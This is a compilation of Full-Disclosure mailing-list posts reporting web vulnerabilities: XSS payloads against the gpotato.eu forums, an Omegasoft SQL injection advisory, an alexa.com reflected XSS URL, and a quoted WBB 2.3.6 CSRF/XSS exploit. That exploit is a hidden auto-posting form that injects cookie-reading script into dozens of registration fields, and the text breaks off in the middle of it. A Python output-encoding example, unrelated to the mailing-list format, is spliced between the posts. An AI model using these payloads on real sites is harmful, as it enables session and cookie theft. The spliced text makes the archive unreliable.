[Full-disclosure] persistent XSS, Manipulation of Data and privilege escalation in gpotato.eu forums

Hi all,

the forums of gpotato.eu are prone to multiple different vulnerabilities.

Timeline for XSS:

14. May: notified gpotato.eu stating that there are security holes in their forum I could use to steal login information
15. May: response: there is no bug in the forum, and as the login information is encrypted, there is no problem
15. May: sending example: <scr<script>ipt>alert(document.cookie);</scr</script>ipt>
16. May: response: Ok, there was a bug when User has IE (bullshit, but example code doesn't work anymore)
16. May: sent next example: <p onmouseover='alert(document.cookie);'>blabla</p>

no more response.

It doesn't work this way anymore, but my code is still sent to the site and only gets enclosed as title=mycode. Still might be vulnerable.

I don't have a timeline for manipulation and escalation, but I told them several times now. It was possible to reply to closed threads, which seems to be fixed now. But for the same time, they know anyone (logged in) can edit anybody's postings, which is still unfixed.

http://t*nyurl.com/5ovmr7

regards
MC.Iglo

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
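The two examples quoted in the report above illustrate why a remove-the-tag filter (which is what the forum's "16 May" fix appears to have been) is the wrong defence and why output encoding is the right one. This is an added defender's example, not code from the original post or from the gpotato.eu forum; the payload strings are constructed from the report's own two examples, and the filter functions are assumptions about what such a fix looks like.

```python
import html
import re

# Constructed from the two payloads quoted in the report above: the nested
# <scr<script>ipt> form that defeated the forum's first fix, and the
# attribute-breaking form that now lands inside title="...".
NESTED_TAG = "<scr<script>ipt>alert(document.cookie);</scr</script>ipt>"
ATTR_BREAK = "' onmouseover='alert(document.cookie);"

SCRIPT_TAG = re.compile(r"</?script>", re.IGNORECASE)


def naive_strip(user_input: str) -> str:
    """Single-pass blacklist (assumed shape of the forum's fix): delete
    <script> and </script> once. Removing the inner tag from the nested
    form reassembles a complete tag from the surrounding characters."""
    return SCRIPT_TAG.sub("", user_input)


def strip_until_stable(user_input: str) -> str:
    """Same blacklist, iterated to a fixed point. Survives nesting, but a
    blacklist still knows nothing about attributes or event handlers."""
    previous = None
    while previous != user_input:
        previous, user_input = user_input, SCRIPT_TAG.sub("", user_input)
    return user_input


def encode_for_html(user_input: str) -> str:
    """Output encoding instead of filtering: every character that can open
    a tag or close a quoted attribute becomes an entity, so the same encoded
    string is safe as an HTML text node and inside a quoted attribute."""
    return html.escape(user_input, quote=True)


def render_post(title: str, body: str) -> str:
    """Render one forum post with user text encoded for both contexts it
    appears in: the title attribute (the report's title=mycode) and the
    visible text node."""
    return f'<p title="{encode_for_html(title)}">{encode_for_html(body)}</p>'


def is_inert(encoded: str) -> bool:
    """Defender check for any render path: no raw tag delimiter or quote
    character survives in the encoded user-supplied portion."""
    return not any(ch in encoded for ch in "<>\"'")
```

Run the check against every place user text is emitted; the blacklist variants are kept only to show the failure modes the report describes.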
[Full-disclosure] static XSS / SQL-Injection in Omegasoft Insel
Input passed to fields in OmegaMw7's tables isn't properly sanitized before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site and/or inject SQL commands.

This applies to many many standard fields in different tables, e.g. F05003, F05005, F05015, and to all user-created text fields using the form creator (you cannot do it a different way).

kind regards
MC.Iglo

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] alexa.com XSS
http://thumbnails.alexa.com/update_thumbnail?url=%3Cscript%3Ealert(%22alexa%20sucks%22)%3C/script%3E

is there more to say?

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] alexa.com XSS
this means they fixed it pretty fast. ok, it isn't that difficult ^^

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Woltlab Burning Board (wbb) 2.3.6 CSRF/XSS - 0day
On my WBB 2.3.3 (and I think this is the default setting) you cannot access register.php when logged in (even as admin). So you need to be logged off to open the evil site. And when you are logged off, the cookie is simply useless.

Also, on my forum, only r_dateformat and r_timeformat are affected.

regards

2007/3/2, SaMuschie [EMAIL PROTECTED]:

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

+--- - -- -
| SaMuschie Research Labs proudly presents . . .
+--- -- - -
| Application: Woltlab Burning Board (wbb)
| Version: 2.3.6 (others not tested)
| Vuln./Exploit Type: CSRF/XSS
| Status: 0day
+- -- - -
| Discovered by: Samenspender
| Released: 20070302
| SaMuschie Release Number: 5
+--- - -- -

CSRF/XSS Exploit:

cat EOF wetpussy.html
form name='evilform' method='POST' action='http://victimhost/wbb2/register.php' input type=hidden name=r_username value='scriptalert(Cookie: + document.cookie)/scriptlol=' input type=hidden name=r_email value='scriptalert(Cookie: + document.cookie)/scriptlol=' input type=hidden name=r_password value='scriptalert(Cookie: + document.cookie)/scriptlol=' input type=hidden name=r_confirmpassword value='scriptalert(Cookie: + document.cookie)/scriptlol=' input type=hidden name=key_string value='scriptalert(Cookie: + document.cookie)/scriptlol=' input type=hidden name=key_number value='scriptalert(Cookie: + document.cookie)/scriptlol=' input type=hidden name=r_homepage value='scriptalert(Cookie: + document.cookie)/scriptlol=' input type=hidden name=r_icq value='scriptalert(Cookie: + document.cookie)/scriptlol=' input type=hidden name=r_aim value='scriptalert(Cookie: + document.cookie)/scriptlol=' input type=hidden name=r_yim value='scriptalert(Cookie: + document.cookie)/scriptlol=' input type=hidden name=r_msn value='scriptalert(Cookie: + document.cookie)/scriptlol=' input type=hidden name=r_day value='scriptalert(Cookie: + document.cookie)/scriptlol=' input type=hidden name=r_month value='scriptalert(Cookie: + document.cookie)/scriptlol=' input type=hidden 
name=r_year value='scriptalert(Cookie: + document.cookie)/scriptlol=' input type=hidden name=r_gender value='scriptalert(Cookie: + document.cookie)/scriptlol=' input type=hidden name=r_signature value='scriptalert(Cookie: + document.cookie)/scriptlol=' input type=hidden name=disablesmilies value='scriptalert(Cookie: + document.cookie)/scriptlol=' input type=hidden name=disablebbcode value='scriptalert(Cookie: + document.cookie)/scriptlol=' input type=hidden name=disableimages value='scriptalert(Cookie: + document.cookie)/scriptlol=' input type=hidden name=r_usertext value='scriptalert(Cookie: + document.cookie)/scriptlol=' input type=hidden name=field%5B1%5D value='scriptalert(Cookie: + document.cookie)/scriptlol=' input type=hidden name=field%5B2%5D value='scriptalert(Cookie: + document.cookie)/scriptlol=' input type=hidden name=field%5B3%5D value='scriptalert(Cookie: + document.cookie)/scriptlol=' input type=hidden name=r_invisible value='scriptalert(Cookie: + document.cookie)/scriptlol=' input type=hidden name=r_usecookies value='scriptalert(Cookie: + document.cookie)/scriptlol=' input type=hidden name=r_admincanemail value='scriptalert(Cookie: + document.cookie)/scriptlol=' input type=hidden name=r_showemail value='scriptalert(Cookie: + document.cookie)/scriptlol=' input type=hidden name=r_usercanemail value='scriptalert(Cookie: + document.cookie)/scriptlol=' input type=hidden name=r_emailnotify value='scriptalert(Cookie: + document.cookie)/scriptlol=' input type=hidden name=r_notificationperpm value='scriptalert(Cookie: + document.cookie)/scriptlol=' input type=hidden name=r_receivepm value='scriptalert(Cookie: + document.cookie)/scriptlol=' input type=hidden name=r_emailonpm value='scriptalert(Cookie: + document.cookie)/scriptlol=' input type=hidden name=r_pmpopup value='scriptalert(Cookie: + document.cookie)/scriptlol=' input type=hidden name=r_showsignatures value='scriptalert(Cookie: + document.cookie)/scriptlol=' input type=hidden name=r_showavatars 
value='scriptalert(Cookie: + document.cookie)/scriptlol=' input type=hidden name=r_showimages value='scriptalert(Cookie: + document.cookie)/scriptlol=' input type=hidden name=r_daysprune value='scriptalert(Cookie: + document.cookie)/scriptlol=' input type=hidden name=r_umaxposts value='scriptalert(Cookie: + document.cookie)/scriptlol=' input type=hidden name=r_threadview value='scriptalert(Cookie: + document.cookie)/scriptlol=' input type=hidden name=r_dateformat value='scriptalert(Cookie: + document.cookie)/scriptlol=' input type=hidden name=r_timeformat value='scriptalert(Cookie: + document.cookie)/scriptlol=' input type=hidden name=r_startweek value='scriptalert(Cookie: +